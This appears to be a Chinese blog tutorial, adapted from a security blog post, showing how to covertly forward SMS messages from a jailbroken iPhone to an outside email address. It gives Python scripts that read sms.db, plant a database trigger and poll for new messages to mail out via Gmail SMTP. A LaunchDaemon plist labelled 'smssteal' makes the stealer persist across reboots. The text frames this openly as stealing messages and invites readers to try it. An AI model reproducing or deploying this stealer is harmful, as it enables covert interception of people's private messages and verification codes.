iPhone上将短信内容发送到指定邮箱的方法

iPhone上将短信内容发送到指定邮箱的方法

迄今为止，移动应用安全基本聚焦在以下几个方面，一是移动设备管理BYOD（bring your own device），二是移动恶意软件分析，三是移动设备用户隐私安全，四是移动操作系统内核漏洞挖掘。对普通用户而言，窃取用户隐私数据的恶意软件是很大的威胁。本篇文章旨在介绍一种如何将设备上的短信发送到指定邮箱中的方法，方法来自Forwarding SMS to Email on Jailbroken iOS

 

实验环境

1.iOS 5.1.1越狱设备

2. 通过cydia安装 python 2.7.3

3. 通过cydia安装SQLite 3.x

4. 通过Cydia安装adv-cmds

 

一、使用python脚本读取sms.db数据库中存储的短信内容

iOS 短信存储在系统的/var/mobile/Library/SMS/文件夹中，包含3个主要文件:

（1）sms.db，标准的SQLite 3格式,存储主要的短信数据

（2）sms.db-shm, "Associate File"

（3）sms.db-wal. “Write Ahead Log"

danimato-iPod:/var/mobile/Library/SMS root# file sms.db
sms.db: SQLite 3.x database

danimato-iPod:/var/mobile/Library/SMS root# file sms.db-shm
sms.db-shm: data

/var/mobile/Library/SMS root# file sms.db-wal
sms.db-wal: data

我们使用SQLite Database Browser打开sms.db,并执行查询语句，会发现如下错误

于是，我们可以使用strings命令查看一下这个文件里面的内容（strings命令在初步分析文件时很有用）

danimato-iPod:/var/mobile/Library/SMS root# strings sms.db >smsdb

打开smsdb文件，可以看到短信message表结构，如下所示

CREATE TABLE message (ROWID INTEGER PRIMARY KEY AUTOINCREMENT, address TEXT, date INTEGER, text TEXT, flags INTEGER, replace INTEGER, svc_center TEXT, group_id INTEGER,association_id INTEGER, height INTEGER, UIFlags INTEGER, version INTEGER, subject TEXT,country TEXT, headers BLOB, recipients BLOB, read INTEGER, madrid_attributedBody BLOB,madrid_handle TEXT, madrid_version INTEGER, madrid_guid TEXT, madrid_type INTEGER,madrid_roomname TEXT, madrid_service TEXT, madrid_account TEXT, madrid_account_guid TEXT,madrid_flags INTEGER, madrid_attachmentInfo BLOB, madrid_url TEXT, madrid_error INTEGER,is_madrid INTEGER, madrid_date_read INTEGER, madrid_date_delivered INTEGER)

我们可以使用python脚本smsDBQuer.py（注意：原脚本不支持中文，需要改变一下）来查询一下该表中的数据，如下所示输出未读短信数量及内容

#!/usr/bin/python
# smstest.py
# by KrishnaChaitanya Yarramsetty
# www.foundstone.com

import sqlite3 as lite
import sys
import smtplib

smspath="/var/mobile/Library/SMS/"

con = lite.connect(smspath+'sms.db')
msg=""

with con:
con.row_factory = lite.Row
cur = con.cursor()
cur.execute('SELECT text，adderss from message where read=0 order by date desc')
rows = cur.fetchall()
#data = cur.fetchone()
counter=0
print "Latest displayed first"
for row in rows:
counter+=1
print "Unread Message: %s" % counter

textencode = row["text"].encode('gb2312')
print "Text: %s" % textencode

addressdecode = row["address"].encode('gb2312')
print "Address: %s" % addressdecode
#print "Text: %s" % row["text"]
msg=row["text"]

我们将smsDBQuery.py脚本上传到设备/var/mobile/Library/SMS/目录下

danimato-iPod:/var/mobile/Library/SMS root# chmod +x smsDBQuery.py

danimato-iPod:/var/mobile/Library/SMS root# python smsDBQuery.py

运行结果如下：

 

二、窃取iPhone短信信息

接下来演示如何将iPhone上短信信息转发到指定邮箱中

1. smsCreateTrigger.py脚本

#!/usr/bin/python
# smstrigger.py
# by KrishnaChaitanya Yarramsetty
# www.foundstone.com

import sqlite3 as lite
import sys

smspath="/var/mobile/Library/SMS/"

con = lite.connect(smspath + 'sms.db')

with con:
con.row_factory = lite.Row
cur = con.cursor()

#cur.execute('DROP TABLE message2;')
#cur.execute('DROP TRIGGER insert_newest_message_email;')
cur.execute('CREATE TABLE message2 (ROWID INTEGER PRIMARY KEY, address TEXT, date INTEGER, text TEXT, emailsent INTEGER);')
cur.execute('CREATE TRIGGER insert_newest_message_email AFTER INSERT ON message WHEN new.ROWID >= 0 BEGIN INSERT INTO "message2" select ROWID,address,date,text,0 from message where ROWID=new.ROWID; END;')
print 'Done.'

我们将smsCreateTrigger.py上传到设备/var/mobile/Library/SMS/目录下，修改执行权限，并运行

danimato-iPod:/var/mobile/Library/SMS root# chmod +x smsCreateTrigger.py

danimato-iPod:/var/mobile/Library/SMS root# python smsCreateTrigger.py 
Done.

该脚本的功能是当message表有记录增加时，将新增记录插入新创建的message2表中

 

2.smsWatcher.py 脚本

#!/usr/bin/python
# smsread.py 
# by KrishnaChaitanya Yarramsetty
# www.foundstone.com

import sqlite3 as lite
import sys
import smtplib
import time

def sendEmail(msg):
fromaddr = 'abc@gmail.com'
toaddrs = 'xyz@gmail.com'

# Credentials 
username = 'abc'
password = '****'

# The actual mail send snippet
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(username,password)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()

#Set path for SMS directory
#smsfromaddress will be used a filter. filter restricts only to those sms that have FROM address as mentioned below. FROM addresses can be multiple as well.
#"address" is the column name.

smspath="/var/mobile/Library/SMS/"
smsfromaddress=('AXARWINF','6564567890',)

#Poll for any new messages waiting to be delivered in an infinite loop with 60 second interval. 
#though it is not one of the efficient methods, considering the purpose of the script it was taken for granted

while 1==1:
#Connect to the database and read sms from 'message2' table.
con = lite.connect(smspath+'sms.db')
with con:
con.row_factory = lite.Row
cur = con.cursor()
cur2 = con.cursor()
cur.execute('SELECT * from message2 where emailsent=0 and address=?',smsfromaddress)
rows = cur.fetchall()
for row in rows:
msg='Address is ' + row["address"] + ' Text Message is ' + row["text"].encode('gb2312') 
sendEmail(msg)
ROWID = (row["ROWID"],)
cur2.execute('UPDATE message2 SET emailsent=1 WHERE ROWID=?', ROWID)
con.commit()
time.sleep(60)

该脚本的功能是将messge2表中指定短信发送到指定邮箱中，我们需要修改脚本中用来接收SMS短信的邮箱相关信息

fromaddr = 'danqingdani@gmail.com' #发件人地址
toaddrs = '335451997@qq.com' #收件人地址

username = 'danqingdani@gmail.com' #发件人邮箱名
password = '****'#发件人邮箱密码

server = smtplib.SMTP('smtp.gmail.com:587')#发件邮件服务器

smsfromaddress=('AXARWINF','6564567890',)#指定你想窃取的短信来自哪里

上传smsWatcher.py到设备/var/mobile/Library/SMS/目录下，修改执行权限，并在后台运行

danimato-iPod:/var/mobile/Library/SMS root# chmod +x smsWatcher.py 
danimato-iPod:/var/mobile/Library/SMS root# python smsWatcher.py &
[1] 4819

当运行上面两个脚本的iPhone有新的短信信息时，短信内容就会发送到你指定的邮箱中去了

 

3.设置脚本开机自动启动

上述脚本如果要常驻系统，开机自动启动，需要做以下设置，首先在/var/mobile/Library/SMS目录下编写一个bash脚本启动smsWatcher.py

danimato-iPod:/var/mobile/Library/SMS root# cat smsWatcher
#!/bin/bash
python /var/mobile/Library/SMS/smsWatcher.py

danimato-iPod:/var/mobile/Library/SMS root# cat smsWatcher
danimato-iPod:/var/mobile/Library/SMS root# chmod +x smsWatcher

然后在/System/Library/LaunchDaemons目录下编写一个plist配置文件，配置开机自动启动

danimato-iPod:/System/Library/LaunchDaemons root# cat com.dani.smssteal.plist 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN""http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.dani.smssteal</string>
<key>Program</key>
<string>/var/mobile/Library/SMS/smsWatcher</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>

danimato-iPod:/System/Library/LaunchDaemons root# launchctl load/System/Library/LaunchDaemons/com.dani.smssteal.plist

有iPhone的朋友可以试一试，欢迎交流

 

参考资料：

http://blog.opensecurityresearch.com/2013/02/forwarding-sms-to-email-on-jailbroken.html